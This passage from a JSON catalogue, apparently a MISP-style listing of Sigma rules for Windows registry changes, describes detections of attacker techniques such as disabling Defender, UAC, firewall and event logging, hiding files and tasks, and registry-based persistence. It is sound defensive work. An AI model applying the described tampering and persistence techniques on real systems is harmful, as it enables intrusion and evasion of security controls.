"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/03/18", - "filename": "registry_set_disable_function_user.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin script" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "value": "Disable Macro Runtime Scan Scope", - "meta": { - "refs": [ - "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", - "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", - "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/10/25", - "filename": "registry_set_disable_macroruntimescanscope.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Disable Microsoft Office Security Features by registry", - "uuid": "7c637634-c95d-4bbf-b26c-a82510874b34", - "value": "Disable Microsoft Office Security Features", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/06/08", - "filename": "registry_set_disable_microsoft_office_security_features.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry modifications that disable Privacy Settings Experience", - "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", - "value": "Disable Privacy Settings Experience in Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/10/02", - "filename": "registry_set_disable_privacy_settings_experience.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate admin script" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", - "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", - "value": "Disable Windows Security Center Notifications", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/08/19", - "filename": "registry_set_disable_security_center_notifications.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of the registry to disable a system restore on the computer", - "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", - "value": "Registry Disable System Restore", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/04/04", - "filename": "registry_set_disable_system_restore.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", - "value": "Disable UAC Using Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2022/01/05", - "filename": "registry_set_disable_uac_registry.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", - "value": "Windows Defender Service Disabled", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_disable_windows_defender_service.yml", - "author": "J\u00e1n Tren\u010dansk\u00fd, frack113, AlertIQ, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "value": "Disable Windows Firewall by Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2022/08/19", - "filename": "registry_set_disable_windows_firewall.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", - "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", - "value": "Disable Winevt Event Logging Via Registry", - "meta": { - "refs": [ - "https://twitter.com/WhichbufferArda/status/1543900539280293889", - "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/07/04", - "filename": "registry_set_disable_winevt_logging.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate administrators disabling specific event log for troubleshooting" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", - "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", - "value": "Add DisallowRun Execution to Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/08/19", - "filename": "registry_set_disallowrun_execution.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box [\u2026] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", - "value": "Persistence Via Disk Cleanup Handler - Autorun", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", - "value": "DNS-over-HTTPS Enabled by Registry", - "meta": { - "refs": [ - "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", - "https://github.com/elastic/detection-rules/issues/1371", - "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", - "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1112" - ], - "creation_date": "2021/07/22", - "filename": "registry_set_dns_over_https_enabled.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", - "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", - "value": "DNS ServerLevelPluginDll Install - Registry", - "meta": { - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ], - "creation_date": "2017/05/08", - "filename": "registry_set_dns_serverlevelplugindll.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "value": "Enabling COR Profiler Environment Variables", - "meta": { - "refs": [ - "https://twitter.com/jamieantisocial/status/1304520651248668673", - "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", - "https://www.sans.org/cyber-security-summit/archives", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" - ], - "creation_date": "2020/09/10", - "filename": "registry_set_enabling_cor_profiler_env_variables.yml", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "value": "Scripted Diagnostics Turn Off Check Enabled - Registry", - "meta": { - "refs": [ - "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/06/15", - "filename": "registry_set_enabling_turnoffcheck.yml", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "value": "COMPlus_ETWEnabled Registry Modification - Registry", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_etw_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/06/05", - "filename": "registry_set_etw_disabled.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "value": "Suspicious Application Allowed Through Exploit Guard", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/05", - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "uuid": "e3fdf743-f05b-4051-990a-b66919be1743", - "value": "Change User Account Associated with the FAX Service", - "meta": { - "refs": [ - "https://twitter.com/dottor_morte/status/1544652325570191361", - "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/07/17", - "filename": "registry_set_fax_change_service_user.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect possible persistence using Fax DLL load when service restart", - "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "value": "Change the Fax Dll", - "meta": { - "refs": [ - "https://twitter.com/dottor_morte/status/1544652325570191361", - "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/07/17", - "filename": "registry_set_fax_dll_persistance.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "value": "New File Association Using Exefile", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1461041276514623491", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/11/19", - "filename": "registry_set_file_association_exefile.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects persistence using GlobalFlags in image file execution options", - "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", - "value": "GlobalFlags Registry Persistence Mechanisms", - "meta": { - "refs": [ - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" - ], - "creation_date": "2018/04/11", - "filename": "registry_set_globalflags_persistence.yml", - "author": "Karneades, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", - "value": "Add Debugger Entry To Hangs Key For Persistence", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/wer_debugger.html", - "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_hangs_debugger_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "This value is not set by default but could be rarly used by administrators" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", - "value": "Persistence Via Hhctrl.ocx", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/hhctrl.html", - "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_hhctrl_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Hides the file extension through modification of the registry", - "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", - "value": "Registry Modification to Hidden File Extension", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", - "https://unit42.paloaltonetworks.com/ransomware-families/", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ], - "creation_date": "2022/01/22", - "filename": "registry_set_hidden_extention.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", - "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", - "value": "Modification of Explorer Hidden Keys", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/04/02", - "filename": "registry_set_hide_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", - "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "value": "Registry Hide Function from User", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/03/18", - "filename": "registry_set_hide_function_user.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate admin script" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", - "value": "Hide Schedule Task Via Index Value Tamper", - "meta": { - "refs": [ - "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2022/08/26", - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", - "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", - "value": "Modification of IE Registry Settings", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/01/22", - "filename": "registry_set_ie_persistence.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", - "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", - "value": "Register New IFiltre For Persistence", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/ifilters.html", - "https://twitter.com/0gtweet/status/1468548924600459267", - "https://github.com/gtworek/PSBits/tree/master/IFilter", - "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_ifilter_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate registration of IFilters by the OS or software" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "uuid": "d223b46b-5621-4037-88fe-fda32eead684", - "value": "New Root or CA or AuthRoot Certificate to Store", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", - "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/04/04", - "filename": "registry_set_install_root_or_ca_certificat.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/05/28", - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", - "value": "Persistence Via LSA Extensions", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/lsaaextension.html", - "https://twitter.com/0gtweet/status/1476286368385019906", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_lsa_extension_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "value": "Adwind RAT / JRAT - Registry", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2017/11/10", - "filename": "registry_set_mal_adwind.yml", - "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to detect system changes made by Blue Mockingbird", - "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", - "value": "Blue Mockingbird - Registry", - "meta": { - "refs": [ - "https://redcanary.com/blog/blue-mockingbird-cryptominer/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112", - 